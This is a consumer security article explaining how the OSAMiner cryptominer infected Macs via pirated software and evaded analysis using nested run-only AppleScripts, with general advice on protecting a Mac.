The macOS Malware That Went Undetected for Years by Using Run-Only AppleScripts

OSAMiner was one of the sneakiest malware that affected macOS devices for almost five years. It used a fairly ingenious trick to avoid being detected and continued to prey on the hardware resources of Macs throughout the globe.

While many people think that macOS devices are impenetrable, this massive breach stumped malware researchers for almost five years. But what is OSAMiner? And how did it evade detection for so long?

What Is OSAMiner Malware?

OSAMiner is a cryptocurrency miner that managed to infect macOS devices for almost five years. It became incredibly popular in the malware research circles because of its ability to resist full analysis for almost half a decade.

While it officially came to light in 2021 in a report by a security firm, SentinelOne, OSAMiner had been infecting macOS devices since 2015. In 2018, Chinese security sites first reported a trojan that targeted macOS devices to mine Monero, a popular private cryptocurrency.

What makes OSAMiner so special compared to other crypto miners is that it went virtually undetected, as malware researchers were unable to retrieve its entire code (which prevented analysis).

How Did OSAMiner Malware Infect Macs?

MacBook with series of codes on the screen

OSAMiner spread primarily through pirated games and software and primarily targeted communities in the Asia-Pacific and Chinese regions. Many people download pirated software and uncensored content through underground torrent sites, making it easier for OSAMiner to spread.

It spread most commonly through popular pirated software, like Microsoft Office for Mac, and games like League of Legends. The installers would download and execute an AppleScript in the background as people installed the pirated software.

This would trigger a run-only AppleScript (more on that below), which would initiate another download, causing another run-only AppleScript download. This would cause one final AppleScript to download and install on the macOS device, making tracking incredibly difficult.

How OSAMiner Managed to Go Undetected

To better understand how OSAMiner could evade detection for so long, it's important to first talk about run-only AppleScripts (which is what OSAMiner is built on). Simply put, AppleScripts are powerful tools that allow automation and provide greater control over software on macOS.

They use the AppleScript language, which is designed to be understandable and easy to read. A run-only AppleScript is a compiled version of an AppleScript that is meant to be executed but not read or modified.

When an AppleScript is saved as a run-only script, it is compiled into a form that can be understood by the computer but is difficult for humans to read (bytecode format). This not only prevents others from seeing or modifying the script's source code but also helps protect any sensitive information that might be contained within the script.

The phrase "run-only" provides a clearer meaning: these scripts aren't meant to be edited in the first place. And because humans can't read the code, OSAMiner wasn't detected by security researchers.

Who Discovered the OSAMiner Infection?

The security research firm that discovered OSAMiner, SentilOne, published a full chain of attack and a detailed list of Indicators of Compromise (IoCs) outlining how OSAMiner was able to infect Macs.

An important thing to note here is that OSAMiner continued to evolve as the attackers behind the malware continued to gain more confidence. Two Chinese security firms did report on OSAMiner back in August and September 2018, though their reports didn't even come close to what OSAMiner was capable of.

They did report on "osascript" being detected, but the reports didn't even make a ripple in the security research circles. The main reason for this was that they couldn't retrieve the full malware code.

Does OSAMiner Still Pose a Security Risk?

Cryptojacking is a serious concern and can attack any device. Nested run-only AppleScripts are widely considered to be a serious attack vector, and while Apple has taken steps to improve security on its devices, malware like OSAMiner still pose a risk.

Even though Macs come with various security features, it's still essential for users to install an antivirus. Ideally, the best way to prevent malware infections is to avoid downloading pirated software or games on your device. Always buy from original sources to mitigate the risk of infection.

Regularly Run Scans to Protect Your Mac

If you browse the internet without any protection, you must scan your system for malware regularly. Malware infections like OSAMiner are clear examples of how sophisticated hackers are getting and how much damage they can cause over time.

There are many ways to protect your Mac from malware, and it's important that you regularly install new security updates as Apple releases them.